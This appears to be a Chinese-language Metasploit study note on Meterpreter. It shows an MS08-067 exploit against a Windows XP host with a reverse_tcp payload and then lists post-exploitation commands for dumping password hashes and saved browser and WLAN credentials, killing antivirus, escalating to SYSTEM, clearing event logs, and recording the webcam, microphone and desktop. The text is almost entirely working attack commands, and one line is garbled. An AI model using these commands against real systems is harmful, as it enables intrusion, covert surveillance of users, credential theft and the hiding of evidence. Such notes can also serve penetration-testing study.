MSF学习(7)Meterpreter
七:Meterpreter
高级动态可扩展payload 基于内存的dll注入
1:演示(Meterpreter的基本命令):
windows XP(不开防火墙)
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.7
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp msf5
exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.1.10
msf5 exploit(windows/smb/ms08_067_netapi) > show missing
msf5 exploit(windows/smb/ms08_067_netapi) > exploit -j
2:基本命令
meterpreter > help
meterpreter > webcam_snap -i 1 -v false
meterpreter > pwd(支持部分liunx命令)
C:\WINDOWS\system32
meterpreter >cd ..(返回上一层)
meterpreter > pwd(当前路径)
C:\WINDOWS
meterpreter > ls
meterpreter > dir(与ls一样)
meterpreter > cat OEWABLog.txt(查看)
meterpreter > mkdir 123 (t添加目录)
meterpreter > rmdir 123(清除目录)
meterpreter > mv OEWABLog.txt 1.txt(重命名)
meterpreter > edit 1.txt(编辑)
meterpreter > lpwd(kali目录) /root
meterpreter > lcd /usr(kali ls)
meterpreter > lpwd /usrown command: nessus_report_list.
meterpreter > run +tab+tab(一些脚本,例如杀死杀毒软件,枚举数据库)
Run在前台执行,bgrun在后台执行
meterpreter > bgrun +tab+tab(一些脚本,例如杀死杀毒软件,枚举数据库)
eg:
meterpreter > bgrun post/windows/gather/enum_computers (枚举域环境下的计算机)
meterpreter > bgrun killav
meterpreter >bgrun post/windows/gather/enum_ie(浏览器帐号密码)
meterpreter > bgrun post/windows/gather/enum_shares (枚举计算机共享)
meterpreter > bgrun post/multi/gather/wlan_geolocate (wlan大概地址)
meterpreter > bgrun post/windows/wlan/wlan_profile(wlan密码读取)
meterpreter > bgrun vnc(远程控制界面,直接看到电脑桌面,就可以看到别人在做什么)
use auxiliary/scanner/rdp/ms12_020_check
lsof -i:port(端口):查看端口使用情况
Kill -9 (进程pid):杀死端口
meterpreter > bgrun sound_recorder(启动声音录制)
meterpreter > bgrun webcam (启动摄像头)
meterpreter > bgrun winbf (使用肉鸡帮助自己进行密码枚举)
meterpreter > clearev(清除日志)
meterpreter > download 1.txt(下载文件)
meterpreter > upload /usr/1.txt c:\\windows\\system32(上传文件软件)
meterpreter > ps(查看当前进程)
meterpreter > execute -f cmd.exe -i(进入cmd)
meterpreter > getuid(查看当前用户帐号)
meterpreter > getsystem(把帐号变成system帐号)
meterpreter > getprivs(查看当前自己的权限)
meterpreter > getproxy(看代理)
meterpreter > getpid(看自己注入到的进程,结合ps)
meterpreter > migrate 728(pid号)迁移注入进程
meterpreter > hashdump(看管理员hash值)
meterpreter > sysinfo (查看操作系统信息)
meterpreter > kill 716(杀死进程pid)
meterpreter > reboot(重启)
meterpreter > shutdown(关机)
meterpreter > shell(获得操作系统的shell)
exit退出
meterpreter > show_mount (查看硬盘情况)
meterpreter > search -f win.ini(在攻击电脑内搜索文件)
Found 1 result...
c:\WINDOWS\win.ini (477 bytes)
meterpreter > arp(当前网络缓存)
meterpreter > netstat(查看当前网络情况)
meterpreter > idletime(目标管理员多久没操作电脑)
meterpreter > resource(调用资源文件,把要执行的命令写一起)
meterpreter > resource -r 1.txt(读取资源文件并执行)
meterpreter > record_mic(记录麦克风)
meterpreter > webcam_list(列出使用摄像头)
meterpreter > webcam_snap -i 1 -v false(摄像头一分钟拍照一次)
3:Meterpreter python 扩增
可以自己写python代码在客户端执行
meterpreter > load python
meterpreter > help
meterpreter >python_execute “print(‘123aaa’)“
meterpreter >python_execute”import os;cd=os.getcwd()” -r cd(-r显示cd)
meterpreter >python_import -f find.py(使用代码python)